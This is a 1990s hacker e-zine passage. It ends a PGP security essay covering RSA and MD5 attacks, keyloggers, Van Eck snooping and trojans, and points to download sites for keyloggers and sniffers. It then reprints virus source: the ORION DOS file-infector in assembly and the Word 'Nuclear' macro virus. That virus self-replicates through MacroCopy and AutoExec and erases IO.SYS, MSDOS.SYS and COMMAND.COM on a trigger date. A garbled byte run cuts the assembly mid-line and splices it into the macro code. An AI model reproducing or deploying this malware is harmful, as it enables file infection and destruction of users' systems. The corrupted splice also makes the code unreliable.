when it is in reality a composite, it is very unlikely. After each
successful test the likelyhood drops dramatically, after one test,
the likelyhood is 1 in 10^13, after two tests, the likelyhood is
1 in 10^26, and if the number passes all four tests, the possibility
of it not being prime is 1 in 10^52. The 4 Fermat Tests will *not*
discard a prime number.
-- The Carmichael Numbers --
Unfortunately, there are some numbers which are *not* prime, that
do satisfy the equation b^(n-1) % n. These integers are known as
The Carmichael Numbers, and are quite rare (the reason being because
a Carmichael Number must not be divisable by the square of any prime
and must be the product of at least three primes). The first
three Carmichael Numbers are: 561, 1105, and 1729. They are so rare,
in fact, there are only 255 of them less than 10^9. The chance of
PGP generating a Carmichael Number is less than 1 in 10^50.
-- Esoteric RSA attacks --
These attacks do not exhibit any profound weakness in RSA itself,
just in certian implementations of the protocol. Most are not
issues in PGP.
-- Choosen cipher-text attack --
An attacker listens in on the insecure channel in which RSA
messages are passed. The attacker collects an encrypted message
c, from the target (destined for some other party). The attacker
wants to be able to read this message without having to mount a
serious factoring effort. In other words, she wants m=c^d.
To recover m, the attacker first chooses a random number, r<n.
(The attacker has the public-key (e,n).) The attacker computes:
x=r^e mod n (She encrypts r with the target's public-key)
y=xc mod n (Multiplies the target ciphertext with the temp)
t=r^-1 mod n (Multiplicative inverse of r mod n)
The attacker counts on the fact property that:
If x=r^e mod n, Then r=x^d mod n
The attacker then gets the target to sign y with her private-key,
(which actually decrypts y) and sends u=y^d mod n to the
attacker. The attacker simply computes:
tu mod n = (r^-1)(y^d) mod n = (r^-1)(x^d)(c^d) mod n = (c^d) mod n
= m
To foil this attack do not sign some random document presented to
you. Sign a one-way hash of the message instead.
-- Low encryption exponent e --
As it turns out, e being a small number does not take away from the
security of RSA. If the encryption exponent is small (common values
are 3,17, and 65537) then public-key operations are significantly
faster. The only problem in using small values for e as a public
exponent is in encrypting small messages. If we have 3 as our e
and we have an m smaller than the cubic root of n, then the message
can be recovered simply by taking the cubic root of m beacuse:
m [for m<= 3rdroot(n)]^3 mod n will be equivalent to m^3
and therefore:
3rdroot(m^3) = m.
To defend against this attack, simply pad the message with a nonce
before encryption, such that m^3 will always be reduced mod n.
PGP uses a small e for the encryption exponent, by default it tries
to use 17. If it cannot compute d with e being 17, PGP will iterate
e to 19, and try again... PGP also makes sure to pad m with a random
value so m > n.
-- Timing attack against RSA --
A very new area of attack publically discovered by Paul Kocher deals
with the fact that different cryptographic operations (in this case
the modular exponentiation operations in RSA) take discretely different
amounts of time to process. If the RSA computations are done without
the Chinese Remainder theorem, the following applies:
An attacker can exploit slight timing differences in RSA computations
to, in many cases, recover d. The attack is a passive one where the
attacker sits on a network and is able to observe the RSA operations.
The attacker passively observes k operations measuring the time t
it takes to compute each modular exponentation operation:
m=c^d mod n. The attacker also knows c and n. The psuedo code of
the attack:
Algorithm to compute m=c^d mod n:
Let m0 = 1.
Let c0 = x.
For i=0 upto (bits in d-1):
If (bit i of d) is 1 then
Let mi+1 = (mi * ci) mod n.
Else
Let mi+1 = mi.
Let di+1 = di^2 mod n.
End.
This is very new (the public announcement was made on 12/7/95)
and intense scrutiny of the attack has not been possible. However,
Ron Rivest had this to say about countering it:
-------------------------------------------BEGIN INCLUDED TEXT---------------
From: Ron Rivest <rivest>
Newsgroups: sci.crypt
Subject: Re: Announce: Timing cryptanalysis of RSA, DH, DSS
Date: 11 Dec 1995 20:17:01 GMT
Organization: MIT Laboratory for Computer Science
The simplest way to defeat Kocher's timing attack is to ensure that the
cryptographic computations take an amount of time that does not depend on the
data being operated on. For example, for RSA it suffices to ensure that
a modular multiplication always takes the same amount of time, independent of
the operands.
A second way to defeat Kocher's attack is to use blinding: you "blind" the
data beforehand, perform the cryptographic computation, and then unblind
afterwards. For RSA, this is quite simple to do. (The blinding and
unblinding operations still need to take a fixed amount of time.) This doesn't
give a fixed overall computation time, but the computation time is then a
random variable that is independent of the operands.
-
================================================================= =============
Ronald L. Rivest 617-253-5880 617-253-8682(Fax) rivest@theory.lcs.mit.edu
================================================================= =============
---------------------------------------------END INCLUDED TEXT---------------
The blinding Rivest speaks of simply introduces a random value into
the decryption process. So,
m = c^d mod n
becomes:
m = r^-1(cr^e)^d mod n
r is the random value, and r^-1 is it's inverse.
PGP is not vulnerable to the timing attack as it uses the CRT to
speed RSA operations. Also, since the timing attack requires an
attacker to observe the cryptographic operations in real time (ie:
snoop the decryption process from start to finish) and most people
encrypt and decrypt off-line, it is further made inpractical.
While the attack is definitly something to be wary of, it is
theorectical in nature, and has not been done in practice as of
yet.
-- Other RSA attacks --
There are other attacks against RSA, such as the common modulous
attack in which several users share n, but have different values
for e and d. Sharing a common modulous with several users, can
enable an attacker to recover a message without factoring n. PGP
does not share public-key modulous' among users.
If d is up to one quarter the size of n and e is less than n, d
can be recovered without factoring. PGP does not choose small
values for the decryption exponent. (If d were too small it might
make a brute force sweep of d values feasible which is obviously a
bad thing.)
-- Keysizes --
It is pointless to make predictions for recommended keysizes.
The breakneck speed at which technology is advancing makes it
difficult and dangerous. Respected cryptographers will not make
predictions past 10 years and I won't embarass myself trying to
make any. For today's secrets, a 1024-bit is probably safe and
a 2048-bit key definitely is. I wouldn't trust these numbers
past the end of the century. However, it is worth mentioning that
RSA would not have lastest this long if it was as fallible as some
crackpots with middle initials would like you to believe.
3 -- [The one-way hash] -- 3
MD5 is the one-way hash used to hash the passphrase into the IDEA
key and to sign documents. Message Digest 5 was designed by Rivest
as a sucessor to MD4 (which was found to be weakened with reduced
rounds). It is slower but more secure. Like all one-way hash
functions, MD5 takes an arbitrary-length input and generates a unique
output.
-- Brute Force of MD5 --
The strength of any one-way hash is defined by how well it can
randomize an arbitrary message and produce a unique output. There
are two types of brute force attacks against a one-way hash
function, pure brute force (my own terminolgy) and the birthday
attack.
-- Pure Brute Force Attack against MD5 --
The output of MD5 is 128-bits. In a pure brute force attack,
the attacker has access to the hash of message H(m). She wants
to find another message m' such that:
H(m) = H(m').
To find such message (assuming it exists) it would take a machine
that could try 1,000,000,000 messages per second about 1.07E22
years. (To find m would require the same amount of time.)
-- The birthday attack against MD5 --
Find two messages that hash to the same value is known as a collision
and is exploited by the birthday attack.
The birthday attack is a statistical probability problem. Given
n inputs and k possible outputs, (MD5 being the function to take
n -> k) there are n(n-1)/2 pairs of inputs. For each pair, there
is a probability of 1/k of both inputs producing the same output.
So, if you take k/2 pairs, the probability will be 50% that a
matching pair will be found. If n > sqrt(k), there is a good chance
of finding a collision. In MD5's case, 2^64 messages need to be
tryed. This is not a feasible attack given today's technology. If
you could try 1,000,000 messages per second, it would take 584,942
years to find a collision. (A machine that could try 1,000,000,000
messages per second would take 585 years, on average.)
For a successful account of the birthday against crypt(3), see:
url:
ftp://ftp.infonexus.com/pub/Philes/Cryptography/crypt3Collision.t xt.gz
-- Other attacks against MD5 --
Differential cryptanalysis has proven to be effective against one
round of MD5, but not against all 4 (differential cryptanalysis
looks at ciphertext pairs whose plaintexts has specfic differences
and analyzes these differences as they propagate through the cipher).
There was successful attack at the compression function itself that
produces collsions, but this attack has no practical impact the
security. If your copy of PGP has had the MD5 code altered to
cause these collisions, it would fail the message digest
verification and you would reject it as altered... Right?
-- Passphrase Length and Information Theory --
According to conventional information theory, the English language
has about 1.3 bits of entropy (information) per 8-bit character.
If the pass phrase entered is long enough, the reuslting MD5 hash will
be statisically random. For the 128-bit output of MD5, a pass phrase
of about 98 characters will provide a random key:
(8/1.3) * (128/8) = (128/1.3) = 98.46 characters
How many people use a 98 character passphrase for you secret-key
in PGP? Below is 98 characters...
12345678901234567890123456789012345678901235678901234567890123456 7\
\890123456789012345678
1.3 comes from the fact that an arbitrary readable English sentence
is usually going to consist of certian letters, (e,r,s, and t are
statiscally very common) thereby reducing it's entropy. If any of the
26 letters in the Latin alphabet were equally possible and likely
(which is seldom the case) the entropy increases. The so-called
absolute rate would, in this case, be:
log(26) / log(2) = 4.7 bits
In this case of increased entropy, a password with a truly random
sequence of English characters will only need to be:
(8/4.7) * (128/8) = (128/4.7) = 27.23 characters
For more info on passphrase length, see the PGP passphrase FAQ:
http://www.stack.urc.tue.nl/~galactus/remailers/passphrase-faq.ht ml
ftp://ftp.infonexus.com/pub/Philes/Cryptography/PGP/PGPpassphrase FAQ.gz
4 -- [The PRNG] -- 4
PGP employs 2 PRNG's to generate and manipulate (psuedo) random data.
The ANSI X9.17 generator and a function which measures the entropy
from the latency in a user's keystrokes. The random pool (which is
the randseed.bin file) is used to seed the ANSI X9.17 PRNG (which uses
IDEA, not 3DES). Randseed.bin is initially generated from trueRand
which is the keystroke timer. The X9.17 generator is pre-washed with
an MD5 hash of the plaintext and postwashed with some random data
which is used to generate the next randseed.bin file. The process is
broken up and discussd below.
-- ANSI X9.17 (cryptRand) --
The ANSI X9.17 is the method of key generation PGP uses. It is
oficially specified using 3DES, but was easily converted to IDEA.
X9.17 requires 24 bytes of random data from randseed.bin. (PGP
keeps an extra 384 bytes of state information for other uses...)
When cryptRand starts, the randseed.bin file is washed (see below)
and the first 24-bytes are used to initialize X9.17. It works as
follows:
E() = an IDEA encryption, with a reusable key used for key generation
T = timestamp (data from randseed.bin used in place of timestamp)
V = Initialization Vector, from randseed.bin
R = random session key to be generated
R = E[E(T) XOR V]
the next V is generated thusly:
V = E[E(T) XOR R]
-- Latency Timer (trueRand) --
The trueRand generator attempts to measure entropy from the latency
of a user's keystrokes every time the user types on the keyboard. It
is used to generate the initial randseed.bin which is in turn used to
seed to X9.17 generator.
The quality of the output of trueRand is dependent upon it's input.
If the input has a low amount of entropy, the output will not be as
random as possible. In order to maxmize the entropy, the keypresses
should be spaced as randomly as possible.
-- X9.17 Prewash with MD5 --
In most situations, the attacker does not know the content of the
plaintext being encrypted by PGP. So, in most cases, washing the
X9.17 generator with an MD5 hash of the plaintext, simply adds to
security. This is based on the assumption that this added unknown
information will add to the entropy of the generator.
If, in the event that the attacker has some information about the
plaintext (perhaps the attacker knows which file was encrypted, and
wishes to prove this fact) the attacker may be able to execute a
known-plaintext attack against X9.17. However, it is not likely
that, with all the other precautions taken, that this would weaken
the generator.
-- Randseed.bin wash --
The randseed is washed before and after each use. In PGP's case
a wash is an IDEA encryption in cipher-feedback mode. Since IDEA
is considered secure (see section 1), it should be just as hard to
determine the 128-bit IDEA key as it is to glean any information from
the wash. The IDEA key used is the MD5 hash of the plaintext and an
initialization vector of zero. The IDEA session key is then generated
as is an IV.
The postwash is considered more secure. More random bytes are
generated to reinitialize randseed.bin. These are encrypted with the
same key as the PGP encrypted message. The reason for this is that if
the attacker knows the session key, she can decrypt the PGP message
directly and would have no need to attack the randseed.bin. (A note,
the attacker might be more interested in the state of the
randseed.bin, if they were attacking all messages, or the message
that the user is expected to send next).
5 -- [Practical Attacks] -- 5
Most of the attacks outlined above are either not possible or not
feasable by the average adversary. So, what can the average cracker
do to subvert the otherwise stalwart security of PGP? As it turns
out, there are several "doable" attacks that can be launched by the
typical cracker. They do not attack the cryptosystem protocols
themselves, (which have shown to be secure) but rather system
specific implementations of PGP.
-- Passive Attacks (Snooping) --
These attacks do not do need to do anything proactive and can easily
go undetected.
-- Keypress Snooping --
Still a very effective method of attack, keypress snooping can subvert
the security of the strongest cryptosystem. If an attacker can
install a keylogger, and capture the passphrase of an unwary target,
then no cryptanalysis whatsoever is necessary. The attacker has the
passphrase to unlock the RSA private key. The system is completely
compromised.
The methods vary from system to system, but I would say DOS-based PGP
would be the most vulnerable. DOS is the easiest OS to subvert, and
has the most key-press snooping tools that I am aware of. All an
attacker would have to do would be gain access to the machine for
under 5 minutes on two seperate occasions and the attack would be
complete. The first time to install the snooping software, the second
time, to remove it, and recover the goods. (If the machine is on a
network, this can all be done *remotely* and the ease of the attack
increases greatly.) Even if the target boots clean, not loading any
TSR's, a boot sector virus could still do the job, transparently.
Just recently, the author has discovered a key logging utility for
Windows, which expands this attack to work under Windows-based PGP
shells (this logger is available from the infonexus via ftp, BTW).
ftp://ftp.infonexus.com/pub/ToolsOfTheTrade/DOS/KeyLoggers/
Keypress snooping under Unix is a bit more complicated, as root
access is needed, unless the target is entering her passphrase from
an X-Windows GUI. There are numerous key loggers available to
passively observe keypresses from an X-Windows session. Check:
ftp://ftp.infonexus.com/pub/SourceAndShell/Xwindows/
-- Van Eck Snooping --
The original invisible threat. Below is a clip from a posting by
noted information warfare guru Winn Schwartau describing a Van Eck
attack:
-------------------------------------------BEGIN INCLUDED TEXT---------------
Van Eck Radiation Helps Catch Spies
"Winn Schwartau" < p00506@psilink.com >
Thu, 24 Feb 94 14:13:19 -0500
Van Eck in Action
Over the last several years, I have discussed in great detail how the
electromagnetic emissions from personal computers (and electronic gear in
general) can be remotely detected without a hard connection and the
information on the computers reconstructed. Electromagnetic eavesdropping is
about insidious as you can get: the victim doesn't and can't know that anyone
is 'listening' to his computer. To the eavesdropper, this provides an ideal
means of surveillance: he can place his eavesdropping equipment a fair
distance away to avoid detection and get a clear representation of what is
being processed on the computer in question. (Please see previous issues of
Security Insider Report for complete technical descriptions of the
techniques.)
The problem, though, is that too many so called security experts, (some
prominent ones who really should know better) pooh-pooh the whole concept,
maintaining they've never seen it work. Well, I'm sorry that none of them
came to my demonstrations over the years, but Van Eck radiation IS real and
does work. In fact, the recent headline grabbing spy case illuminates the
point.
Exploitation of Van Eck radiation appears to be responsible, at least in part,
for the arrest of senior CIA intelligence officer Aldrich Hazen Ames on
charges of being a Soviet/Russian mole. According to the Affidavit in support
of Arrest Warrant, the FBI used "electronic surveillance of Ames' personal
computer and software within his residence," in their search for evidence
against him. On October 9, 1993, the FBI "placed an electronic monitor in his
(Ames') computer," suggesting that a Van Eck receiver and transmitter was used
to gather information on a real-time basis. Obviously, then, this is an ideal
tool for criminal investigation - one that apparently works quite well. (From
the Affidavit and from David Johnston, "Tailed Cars and Tapped Telephones: How
US Drew Net on Spy Suspects," New York Times, February 24, 1994.)
>From what we can gather at this point, the FBI black-bagged Ames' house and
installed a number of surveillance devices. We have a high confidence factor
that one of them was a small Van Eck detector which captured either CRT
signals or keyboard strokes or both. The device would work like this:
A small receiver operating in the 22MHz range (pixel frequency) would detect
the video signals minus the horizontal and vertical sync signals. Since the
device would be inside the computer itself, the signal strength would be more
than adequate to provide a quality source. The little device would then
retransmit the collected data in real-time to a remote surveillance vehicle or
site where the video/keyboard data was stored on a video or digital storage
medium.
At a forensic laboratory, technicians would recreate the original screens and
data that Mr. Ames entered into his computer. The technicians would add a
vertical sync signal of about 59.94 Hz, and a horizontal sync signal of about
27KHz. This would stabilize the roll of the picture. In addition, the
captured data would be subject to "cleansing" - meaning that the spurious
noise in the signal would be stripped using Fast Fourier Transform techniques
in either hardware or software. It is likely, though, that the FBI's device
contained within it an FFT chip designed by the NSA a couple of years ago to
make the laboratory process even easier.
I spoke to the FBI and US Attorney's Office about the technology used for
this, and none of them would confirm or deny the technology used "on an active
case."
Of course it is possible that the FBI did not place a monitoring device within
the computer itself, but merely focused an external antenna at Mr. Ames'
residence to "listen" to his computer from afar, but this presents additional
complexities for law enforcement.
1. The farther from the source the detection equipment sits means that
the detected information is "noisier" and requires additional forensic
analysis to derive usable information.
2. Depending upon the electromagnetic sewage content of the immediate
area around Mr. Ames' neighborhood, the FBI surveillance team would be limited
as to what distances this technique would still be viable. Distance squared
attenuation holds true.
3. The closer the surveillance team sits to the target, the more likely
it is that their activities will be discovered.
In either case, the technology is real and was apparently used in this
investigation. But now, a few questions arise.
1. Does a court surveillance order include the right to remotely
eavesdrop upon the unintentional emanations from a suspect's electronic
equipment? Did the warrants specify this technique or were they shrouded
under a more general surveillance authorization? Interesting question for the
defense.
2. Is the information garnered in this manner admissible in court? I
have read papers that claim defending against this method is illegal in the
United States, but I have been unable to substantiate that supposition.
3. If this case goes to court, it would seem that the investigators would
have to admit HOW they intercepted signals, and a smart lawyer (contradictory
allegory :-) would attempt to pry out the relevant details. This is important
because the techniques are generally classified within the intelligence
community even though they are well understood and explained in open source
materials. How will the veil of national security be dropped here?
To the best of my knowledge, this is the first time that the Government had
admitted the use of Van Eck (Tempest Busting etc.) in public. If anyone
knows of any others, I would love to know about it.
---------------------------------------------END INCLUDED TEXT---------------
The relevance to PGP is obvious, and the threat is real. Snooping
the passphrase from the keyboard, and even whole messages from
the screen are viable attacks. This attack, however exotic it may
seem, is not beyond the capability of anyone with some technical
know-how and the desire to read PGP encrypted files.
-- Memory Space Snooping --
In a multi-user system such as Unix, the physical memory of the
machine can be examined by anyone with the proper privaleges (usally
root). In comparsion with factoring a huge composite number, opening
up the virtual memory of the system (/dev/kmem) and seeking to a
user's page and directly reading it, is trivial.
-- Disk Cache Snooping --
In multitasking environments such as Windows, the OS has a nasty habit
of paging the contents of memory to disk, usally transparently to the
user, whenever it feels the need to free up some RAM. This
information can sit, in the clear, in the swapfile for varying lengths
of time, just waiting for some one to come along and recover it.
Again, in a networked environment where machine access can be done with
relative impunity, this file can be stolen without the owner's consent
or knowledge.
-- Packet Sniffing --
If you use PGP on a host which you access remotely, you can be
vulnerable to this attack. Unless you use some sort of session
encrypting utility, such as SSH, DESlogin, or some sort of network
protocol stack encryption (end to end or link by link) you are sending
your passphrase, and messages across in the clear. A packet sniffer
sitting at a intermediate point between your terminal can capture all
this information quietly and efficiently. Packet sniffers are
available at the infonexus:
ftp://ftp.infonexus.com/pub/SourceAndShell/Sniffers/
-- Active Attacks --
These attacks are more proactive in nature and tend to be a bit more
difficult to wage.
-- Trojan Horse --
The age old trojan horse attack is still a very effective means
of compromise. The concept of a trojan horse should not be foriegn
to anyone. An apparently harmless program that in reality is evil
and does potentially malicious things to your computer. How does
this sound...:
Some 31it3 coder has come up with a k3wl new Windows front-end to
PGP. All the newbies run out and ftp a copy. It works great, with
a host of buttons and scrollbars, and it even comes with a bunch
of *.wav files and support for a SB AWE 32 so you can have the
16-bit CD quality sound of a safe locking when you encrypt your
files. It runs in a tiny amount of memory, coded such that nothing
leaks, it intercepts OS calls that would otherwise have it's contents
paged to disk and makes sure all the info stays in volatile memory.
It works great (the first Windows app thar does). Trouble is, this
program actually has a few lines of malevolent code that record your
secret-key passphrase, and if it finds a modem (who doesn't have a
modem these days?) it 'atm0's the modem and dials up a hard coded
number to some compromised computer or modem bank and sends the info
through.
Possible? Yes. Likely? No.
-- Reworked Code --
The code to PGP is publically available. Therefore it is easy to
modify. If someone were to modify the sourcecode to PGP inserting
a sneaky backdoor and leave it at some distribution point, it could
be disasterous. However, it is also very easy to detect. Simply
verify the checksums. Patching the MD5 module to report a false
checksum is also possible, so verify using a known good copy.
A more devious attack would be to modify the code, compile it and
surreptitouly plant in the target system. In a networked environment
this can be done without ever having physical access to the machine.
6 -- [What if...] -- 6
...My secret key was comprimsed?
A PGP secret key is kept conventionally encrypted with IDEA. Assuming
your passphrase is secure enough (see section 3) the best method of
attack will be a brute force key-search. If an attacker could test
1,000,000,000,000 keys per second, it would take 1x10^17 years
before odds will be in the attacker's favor...
...PGP ran outta primes?
There are an infinite amount of prime numbers. The approximate
density of primes lesser than or equal to n is n/ln(n). For a
1024-bit key, this yields:
1.8*10^308/ln(1.8*10^308) = 2.5*10^305
There are about 2.5*10^228 times more prime numbers less than
1024-bits than there are atoms in the universe...
...What if someone made a list of all these prime numbers?
If you could store 1,000,000 terabytes of information of a device
that weighs 1 gram, (and we figure each number fits in a space of 128
bytes or less) we would need a device that weighs 3.2*10^289 grams or
7*10^286 pounds. This is 1.6*10^256 times more massive than our sun.
Nevermind the fact that we don't have enough matter to even concieve
of building such a device, and if we could, it would collapse into
a black-hole...
...And used them in a brute force search?
There are 2.5E305(2.5E305-1)/2 possible pairs. This is 3.12*10^610
combinations. Absurd, isn't it?
...PGP chose composites instead of primes?
The likelyhood of the Fermat Tests of passing a composite off as a
prime is 1 in 10^52. If PGP could generate 1,000,000,000,000 primes
per second, It would take about 1x10^32 years until odds are better
than even for that to happen.
7 -- [Closing Comments] -- 7
I have presented factual data, statistical data, and projected data.
Form your own conclusions. Perhaps the NSA has found a polynomial-time
(read: *fast*) factoring algorithm. But we cannot dismiss an
otherwise secure cryptosystem due to paranoia. Of course, on the
same token, we cannot trust cryptosystems on hearsay or assumptions of
security. Bottom line is this: in the field of computer security, it
pays to be cautious. But it doens't pay to be un-informed or
needlessly paranoid. Know the facts.
-- [Thank You's (in no particular order)] --
PRZ, Collin Plumb, Paul Kocher, Bruce Schneier, Paul Rubin, Stephen
McCluskey, Adam Back, Bill Unruh, Ben Cantrick, Jordy, Galactus,
the readers of sci.crypt and the comp.security.* groups...
* * * * * * * * * * * * * * * * * * * *
-= H A C K E R S =-
Issue #7, File #7 of 9
Assorted Viruses
Compiled by: Ted Kohl
[These are two mail messages I received from Ted Kohl of viruses that he
apparently found on various news groups.
-Revolution]
>From tkohl@inav.netThu Feb 22 14:47:13 1996
Date: Tue, 20 Feb 1996 14:08:52 -0600
From: Tod Kohl <tkohl@inav.net>
To: mrs3691@hertz.njit.edu
Subject: Virus texts
Enclosed are articles I scrounged from alt.comp.virus. They contain the
source code for the moebius & monkey viruses. I am not a VX guy
myself, and take no credit (or blame) for the contents of these files.
However, I think you readership will find them amusing ;).
Please note the change in my email address for future mailings.
From: Mobius <mobius@presence.co.uk>
Newsgroups: alt.comp.virus
Subject: Orion virus [NEW] Source
Date: Thu, 9 Nov 1995 13:55:23 +0000
Organization: Web13 Internet Cafe
Lines: 185
Message-ID: <Pine.LNX.3.91.951109134444.16748C-100000@elvis.presence.co.uk>
NNTP-Posting-Host: elvis.presence.co.uk
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hi,
In regard to the source versus non-source I feel the need to say my
bit, I am always in favour of posting it, for the semi-experienced it can
provide a valuable means of learning to disinfect his/her infected
files, and for the anti-virus people it means that sources are out in the
open, okay some some c00l people are going to give them to friends/enemys
but if they are commonly available then the AV people should have a
software solution also. End result maybe more folk are infected, but at
the same time if the source is out in the open an AV solution should
exist, or an experienced programmer could cobbled one up.
I wrote this virus, I have written several, but this is the first one
to be posted, I am doing this for the reasons stated above. I have also
written a stand-alone disinfection program that will scann and remove
this virus. I shall not post if but will mail it to others if interested.
This was going to be an unusual virus, but it isn't it is a direct
non-resident appending virus, but it doesn't use the:
call next
next:
pop reg1
sub reg1,offset next
type of code. Instead it calculates the 'delta offset' directly at
infection time. Enough waffle, assebles under a86.
Mobius
Why did the chicken cross the mobius strip?
To get to the other... oh bugger!
; ORION Version One - 9/10/1995 By Mobius
; Mail to: Mobius@presence.co.uk
Start:
mov BP,0000h ; Initial Delta+ offset
lea DX,[BP + offset DTA] ; Point to new DTA
mov Ah,1ah
int 21h ; Change DTA
mov CX,0000h ; Search for normal files
mov Ah,4eh ; Findfirst function
mov dx,[BP+offset store] ; Get original host's bytes
push dx ; and store them on the stack
mov dx,[BP+offset store+2] ; then do it some more
push dx ; store on stack too.
lea DX,[BP + offset mask] ; Look for *.COM
int 21h ; With the help of DOS
jc restore ; No files found. Quit
jmp infect ; Else go and play
Retry:
mov Ah,4fh ; Find-first function
int 21h ; Introduce new files to ourself
jnc infect ; If they like us go and
play together
Restore:
mov Dx,80h ; Original DTA
mov Ah,1ah ; Set it as current
int 21h ; Via DOS
mov DI,100h ; Restore hosts three bytes
to 100h
pop ax ; they were on the stack,
remember?
pop bx ; three bytes were needed,
but we kept
mov [di],bl ; a spare one, restore first one
inc di ; increase pointer
mov [di],bh ; restore the next one
inc di ; increase the pointer
mov [di],al ; Restored all three bytes now
mov DX,100h ; DX=100h
push DX ; And push it on stack as
home-time
ret ; address, jump to it,
(Effectively)
Namey:
db "ORION",00 ; My name for this code. (A
cool book, by
; Ben Bova, buy it, read it,
love it)
Author:
db "Mobius",00 ; Thats me!
Infect:
lea DX,[BP + offset DTA + 1eh] ; Point to name in DTA
mov Ax,3d02h ; Open file for read/write
int 21h ; Don't you just love DOS
mov BX,AX ; File handle in BX
mov Ah,3fh ; read from file
lea DX,[BP + offset store] ; Read bytes here, (Notice
how we already
mov CX,0003h ; the hosts bytes from here
so they won't
int 21h ; get corrupted). Anyway,
read 3 bytes
jc close ; Error in read, abandon if so.
jmp Go_Ahead
Already_infected:
mov Ah,3eh ; Close file time.
int 21h ; With the workhorse DOS
jmp retry ; Try again, no really!
Go_Ahead:
mov AX,4202h ; Get ready to infeot,A(?ò{
MacroCopy "Global:Payload", WindowName$()+":Payload",1
'Set to save document as a template.
dlg.Format = 1
End If
FileSaveAs dlg 'save the document infected.
End Sub
========================================================
PURPOSE: To call InsertPayload when someone chooses
Print from the File menu.
MACRO NAME: FilePrint
MACRO CODE:
Sub MAIN
Call InsertPayload 'possibly insert text.
Dim dlg As FilePrint 'declare dialog of type FilePrint
GetCurValues dlg
Dialog dlg 'excute print dialog window.
FilePrint dlg 'perform actions from dialog.
End Sub
========================================================
PURPOSE: To call InsertPayload when someone clicks
the "Print" button on the toolbar.
MACRO NAME: FilePrintDefault
MACRO CODE:
Sub MAIN
Call InsertPayload 'possibly insert text.
FilePrintDefault 'print document using default settings.
End Sub
========================================================
PURPOSE: Insert some text into documents if Second > 55.
MACRO NAME: InsertPayload
MACRO CODE:
Sub MAIN
If Second(Now()) > 55 Then 'seconds > 55 ?
EndOfDocument 'go to the end of document.
Insert Chr($ 11)
Insert "And finally I would like to say:"
Insert Chr($ 11)
Insert "No CUNTRY can do Nuclear Testing in the Pacific "
Insert Chr($ 11)
Insert " EXCEPT The United States of America "
Insert Chr($ 11)
Insert " OR we will BOMB the shit out of ya!"
StartOfDocument 'go to the start of document.
End If
End Sub
========================================================
PURPOSE: What the hell do you think?
MACRO NAME: PayLoad
MACRO CODE:
Sub MAIN:
If Day(Now())=5 And Month(Now())=4 Then
SetAttr "C:\IO.SYS",0
Open "C:\IO.SYS" For Output As #1
Close #1
SetAttr "C:\MSDOS.SYS",0
Open "C:\MSDOS.SYS",0
Close #1
SetAttr "C:\COMMAND.COM",0
Open "C:\COMMAND.COM" For Output As #1
Close #1
Kill "C:\COMMAND.COM"
End If
End Sub
========================================================
Sub MAIN
'Is is 5PM ? - approx time before work is finished.
If Hour(Now()) <> 5 + 12 Then
Goto NoDropper
On Error Goto NoDropper 'setup an error handler
Open "C:\DOS\DEBUG.EXE" For Input As #1 'does DEBUG exist?
Close #1 'Yes, close it.
Open "C:\DOS\PH33R.SCR" For Output As #1 'dump script.
Print #1, "N PH33R.COM"
Print #1, "E 0100 E8 47 00 06 1F BF 00 01 57 B8 CD 20 AB B8 00 00"
Print #1, "RCX" 'Convert this to "G" to run the code
Print #1, "0734"
Print #1, "G"
Print #1, "Q"
Print #1, ""
Close #1
Open "C:\DOS\EXEC_PH.BAT" For Output As #1
Print #1, "@echo off"
Print #1, "debug < ph33r.scr > nul"
Close #1
ChDir "C:\DOS"
Shell "EXEC_PH.BAT", 0
'Delete temporary files.
Kill "C:\DOS\EXEC_PH.BAT"
Kill "C:\DOS\PH33R.SCR"
NoDropper:
End Sub
>From tkohl@inav.netThu Feb 22 14:48:01 1996
Date: Tue, 20 Feb 1996 16:57:03 -0600
From: Tod Kohl <tkohl@inav.net>
To: mrs3691@hertz.njit.edu
Subject: More stuff
Oh yeah, here's Winword Nuclear
essage-ID: <488rev$5bt@hermes.oanet.com>
References: <47du9f$mcm@gap.cco.caltech.edu> <59.6285.3348@windmill.com>
<47umvg$t64@lastactionhero.rs.itd.umich.edu> <816001159snz@mist.demon.co.uk>
NNTP-Posting-Host: dialin14.oanet.com
Mime-Version: 1.0
Content-Type: multipart/mixed;
Boundary="*-*-*- Next Section -*-*-*"
X-Newsreader: WinVN 0.92.6+
--*-*-*- Next Section -*-*-*
Content-Type: text/plain
In article <816001159snz@mist.demon.co.uk>, Iolo Davidson
<iolo@mist.demon.co.uk> says:
>
>In article <47umvg$t64@lastactionhero.rs.itd.umich.edu>
> bpb@stimpy.us.itd.umich.edu "Bruce Burrell" writes:
>
>> To write code to detect or remove the viruses, though, one would
>> probably want to know a higher level language. With the workload the AV
>> industry has, I'd imagine any shortcuts would be welcome. Sure, there's
>> probably some assembler optimization of oft-called routines, but I'd bet
>> that C++ suffices most of the time.
>
>C++ is hardly a shortcut, but I am having to learn it because my
>assembler skills are no longer in demand. TSRs are dying, and
>VxDs are being written in C now. You need assembler and
>specialist knowledge of the operating system at a low level to
>research viruses, but it is no use to a programmer anymore.
>
Silly boys, you don't need C, C++, assembler and specific knowledge of
the operating system in order to research virus. Here is an example of
codes written in Windword macro:
By the way, this program is also for anybody who is insterested or
curious in the macro viruses.
King Soloman, I am FOR ....... Do you think this post will result in a
more widespread of the macro viruses. Yes, it might. But those people
who are freightened by these viruses will understand them and know how
to deal with them better..
--*-*-*- Next Section -*-*-*
Content-Type: Text/Plain
NEW WORD 6.0 MACRO VIRUS
------------------------
New Features:
* Drops another virus ("PH33R"): most of the virus script has been
* deleted, it doesn't work anyway - Please
* insert a better virus dropper
* Stealth's existence from the user.
* Bypasses "Save NORMAL.DOT?" prompt.
* Inserts text into documents when printing (at times).
* Uses execute-only macro's.
* Contains a payload to destroy IO.SYS/MSDOS.SYS/COMMAND.COM
on April the 5th.
========================================================
PURPOSE: To enable NORMAL.DOT to be saved without
prompting.
MACRO NAME: FileExit
MACRO CODE:
Sub MAIN
ToolsOptionsSave .GlobalDotPrompt = 0
FileExit
End Sub
========================================================
PURPOSE: To make the virus active before any
documents have been loaded.
MACRO NAME: AutoExec
MACRO CODE:
Sub MAIN
If CheckInstalled = 0 Then
MacroCopy WindowName$()+":AutoExec", "Global:AutoExec", 1
MacroCopy WindowName$()+":ToolsMacro", "Global:ToolsMacro", 1
MacroCopy WindowName$()+":AutoOpen", "Global:AutoOpen", 1
MacroCopy WindowName$()+":FileSaveAs", "Global:FileSaveAs", 1
MacroCopy WindowName$()+":FilePrint", "Global:FilePrint", 1
